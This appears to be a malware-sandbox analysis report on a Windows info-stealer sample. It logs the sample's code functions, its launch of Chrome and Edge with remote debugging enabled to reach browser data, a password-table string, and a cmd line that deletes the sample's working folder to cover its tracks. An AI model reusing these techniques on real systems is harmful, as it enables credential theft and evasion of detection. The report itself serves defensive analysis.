            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004047810_2_00404781
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040E7A10_2_0040E7A1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004077B10_2_004077B1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040E8410_2_0040E841
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004058610_2_00405861
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004048710_2_00404871
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040C8010_2_0040C801
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004068010_2_00406801
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040A8F10_2_0040A8F1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004078910_2_00407891
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040B8A10_2_0040B8A1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004098B10_2_004098B1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004069410_2_00406941
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040E9510_2_0040E951
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040D9710_2_0040D971
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040B9710_2_0040B971
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004089110_2_00408911
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004049210_2_00404921
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004059210_2_00405921
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040C9210_2_0040C921
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0041F9310_2_0041F931
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043B9310_2_0043B931
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004059D10_2_004059D1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0041C9810_2_0041C981
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040A9A10_2_0040A9A1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040CA510_2_0040CA51
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00406A610_2_00406A61
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00405A710_2_00405A71
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040AA710_2_0040AA71
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0041FA010_2_0041FA01
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040FA010_2_0040FA01
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043CA010_2_0043CA01
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00404A110_2_00404A11
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00401A280_2_00401A28
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00408A310_2_00408A31
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043CAD10_2_0043CAD1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00409AF10_2_00409AF1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040DA810_2_0040DA81
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00407A910_2_00407A91
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0042DB610_2_0042DB61
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0041EB710_2_0041EB71
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00403B010_2_00403B01
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00405B110_2_00405B11
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00408B210_2_00408B21
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00401B280_2_00401B28
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040AB310_2_0040AB31
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00404B310_2_00404B31
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043BB310_2_0043BB31
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00403BC10_2_00403BC1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00404BC10_2_00404BC1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00426BD10_2_00426BD1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040DBE10_2_0040DBE1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00407BF10_2_00407BF1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00406B810_2_00406B81
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040CBA10_2_0040CBA1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040EBA10_2_0040EBA1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043CBA10_2_0043CBA1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0042EBA10_2_0042EBA1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040BBB10_2_0040BBB1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00409BB10_2_00409BB1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040CC410_2_0040CC41
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00439C510_2_00439C51
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043CC610_2_0043CC61
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00406C710_2_00406C71
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040BC710_2_0040BC71
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00426C710_2_00426C71
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00405C210_2_00405C21
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00408C210_2_00408C21
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040EC310_2_0040EC31
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043ECC10_2_0043ECC1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00404CE10_2_00404CE1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00403C810_2_00403C81
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00409CA10_2_00409CA1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043BCA10_2_0043BCA1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00407CB10_2_00407CB1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00420CB10_2_00420CB1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040BD510_2_0040BD51
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0042DD510_2_0042DD51
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00409D610_2_00409D61
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0041ED010_2_0041ED01
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00406D010_2_00406D01
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040CD010_2_0040CD01
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040DD010_2_0040DD01
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040ED010_2_0040ED01
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043CD010_2_0043CD01
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00405D110_2_00405D11
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00408D310_2_00408D31
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00426D310_2_00426D31
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00407DD10_2_00407DD1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040DDD10_2_0040DDD1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00426DD10_2_00426DD1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043CDE10_2_0043CDE1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00406DF10_2_00406DF1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00403DA10_2_00403DA1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040CDA10_2_0040CDA1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043BDB10_2_0043BDB1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040CE410_2_0040CE41
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043BE710_2_0043BE71
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040AE010_2_0040AE01
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00404E010_2_00404E01
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00408E010_2_00408E01
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00405E110_2_00405E11
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00403E310_2_00403E31
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00409ED10_2_00409ED1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00403ED10_2_00403ED1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040BEE10_2_0040BEE1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00406E910_2_00406E91
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00429E910_2_00429E91
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0041AEA10_2_0041AEA1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040DEA10_2_0040DEA1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00408EB10_2_00408EB1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043CEB10_2_0043CEB1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0041EF510_2_0041EF51
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00425F520_2_00425F52
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043CF510_2_0043CF51
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040CF610_2_0040CF61
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00408F610_2_00408F61
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00409F710_2_00409F71
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040EF010_2_0040EF01
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00405F010_2_00405F01
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043BF110_2_0043BF11
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00406F310_2_00406F31
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00404F310_2_00404F31
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00405FC10_2_00405FC1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040EFE10_2_0040EFE1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00407F910_2_00407F91
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00429F910_2_00429F91
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0041CFA10_2_0041CFA1
            Source: pyjnkasedf.exe, 00000000.00000002.2023659585.000000000092E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs pyjnkasedf.exe
            Source: pyjnkasedf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@68/281@26/26
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0042F29E CreateToolhelp32Snapshot,Process32First,0_2_0042F29E
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\QEBJG4SO.htmJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8784:120:WilError_03
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user\AppData\Local\Temp\5b6824aa-3269-4a44-a181-cbd23beeb41e.tmpJump to behavior
            Source: pyjnkasedf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: AAAAKJKJE.0.dr, KFHJJDHJE.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: pyjnkasedf.exeReversingLabs: Detection: 57%
            Source: unknownProcess created: C:\Users\user\Desktop\pyjnkasedf.exe "C:\Users\user\Desktop\pyjnkasedf.exe"
            Source: C:\Users\user\Desktop\pyjnkasedf.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2144,i,14125693394083356275,3437472649324227348,262144 /prefetch:8
            Source: C:\Users\user\Desktop\pyjnkasedf.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2240,i,3036203601739144337,7572605890428226246,262144 /prefetch:3
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2252,i,8509466360616789321,11479808896737917615,262144 /prefetch:3
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6632 --field-trial-handle=2252,i,8509466360616789321,11479808896737917615,262144 /prefetch:8
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6800 --field-trial-handle=2252,i,8509466360616789321,11479808896737917615,262144 /prefetch:8
            Source: C:\Users\user\Desktop\pyjnkasedf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGCFHDAKECFI" & exit
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceuserer --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6136 --field-trial-handle=2252,i,8509466360616789321,11479808896737917615,262144 /prefetch:8
            Source: C:\Users\user\Desktop\pyjnkasedf.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGCFHDAKECFI" & exitJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2144,i,14125693394083356275,3437472649324227348,262144 /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2240,i,3036203601739144337,7572605890428226246,262144 /prefetch:3Jump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2252,i,8509466360616789321,11479808896737917615,262144 /prefetch:3Jump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6632 --field-trial-handle=2252,i,8509466360616789321,11479808896737917615,262144 /prefetch:8Jump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6800 --field-trial-handle=2252,i,8509466360616789321,11479808896737917615,262144 /prefetch:8Jump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceuserer --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6136 --field-trial-handle=2252,i,8509466360616789321,11479808896737917615,262144 /prefetch:8Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: gpapi.dllJump to behavior
